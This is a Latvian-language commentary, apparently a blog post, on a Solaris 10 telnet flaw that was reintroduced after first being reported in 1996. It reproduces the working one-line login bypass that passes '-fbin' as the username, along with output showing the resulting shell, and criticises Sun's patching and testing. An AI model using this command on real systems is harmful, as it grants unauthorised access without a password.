Vecās kļūdas ir labākās kļūdas

Nedēļas nogalē Deivids Meinors ievietoja piezīmi savā Emuārs kas apgalvoja, ka tā sauktais Telnet serveris operētājsistēmā Sun Solaris 10/11 neprasa nekādas prasmes, nekādas ekspluatācijas zināšanas un to var skriptēt masu uzbrukumiem.





Telnet ir 1970. gadu programma, kas ļauj cilvēkiem attālināti pieteikties datorā. Tas parasti ir atspējots, jo lietotājvārdi un paroles tiek sūtītas, neizmantojot šifrēšanu (ko tolaik bija aizliegts eksportēt no Amerikas Savienotajām Valstīm). Taču, lai gan programma lielā mērā ir pamesta, Sun joprojām piegādā savas Solaris 10 operētājsistēmas gan ar Telnet serveri, gan klienta programmām.

Jebkurā gadījumā Telnet serveris izmanto lietotājvārdu, ko nodrošina persona, kas mēģina pieteikties, un sniedz šo informāciju tā sauktajai pieteikšanās programmai. Pieteikšanās programmas uzdevums ir pieprasīt lietotāja lietotājvārdu un paroli. Parasti tas to dara, un, ja parole ir pareiza, lietotājam ir atļauts pieteikties.

Maynor atklāja, ka uzbrucējs var mēģināt pieteikties ar lietotājvārdu, piemēram, -fbin. -fbin tiek nodots pieteikšanās programmai, kas nepareizi interpretē -f kā operētājsistēmas komandu, lai pieteiktos lietotājam norādītajā kontā, neprasot paroli. Tātad ekspluatācija izskatās šādi:



% telnet -l -fbin 192.168.1.110
Mēģina 192.168.1.110…
Savienots ar 192.168.1.110.
Escape rakstzīme ir “^]”.
Pēdējā pieteikšanās: svētdien, 11. februāris 02:02:23 no 192.168.1.102
Sun Microsystems Inc. SunOS 5.10 Generic, 2005. gada janvāris
$ id
uid = 2 (bin) gid = 2 (bin)

(Jūs varat izlasīt visu asiņaino informāciju šeit )

Patiešām pārsteidzoši ir tas, ka šī ievainojamība vispirms tika atklāta ziņots 1996. gadā izveidoja Computer Emergency Response Team. Acīmredzot kļūdu atkārtoti ieviesa kāds programmētājs, kurš nebija pazīstams ar vēsturi. Man teica, ka kopš tā laika tas ir labots Solaris 11.



Tātad, kas šeit ir nepareizi? Daudzas lietas.

  1. Kad Sun inženieri to salaboja Solaris 11, viņiem tas bija jāizlabo arī Solaris 10.
  2. Šobrīd Sun pat nevajadzētu piegādāt Telnet serveri.
  3. Un, ja viņi gatavojas nosūtīt serveri, viņiem tas tiešām ir jāpārbauda. Lai gan es nevaru zināt, kas notika Sun, es domāju, ka viņi neuztraucās pārbaudīt serveri, jo tas pēc noklusējuma ir atspējots.

Pagājušajā nedēļā runājot ar drošības konsultantu RSA drošības tirdzniecības izstādē, man teica, ka banku sistēmu ražošanas serveros fiksētās drošības kļūdas bieži tiek atkārtoti ieviestas, kad tiek piegādāti jauni laidieni. Tās, protams, ir labas ziņas drošības konsultantiem. Taču tas arī izskaidro, kāpēc organizētajai noziedzībai ir tik viegli ātri pelnīt naudu internetā.

paslēpties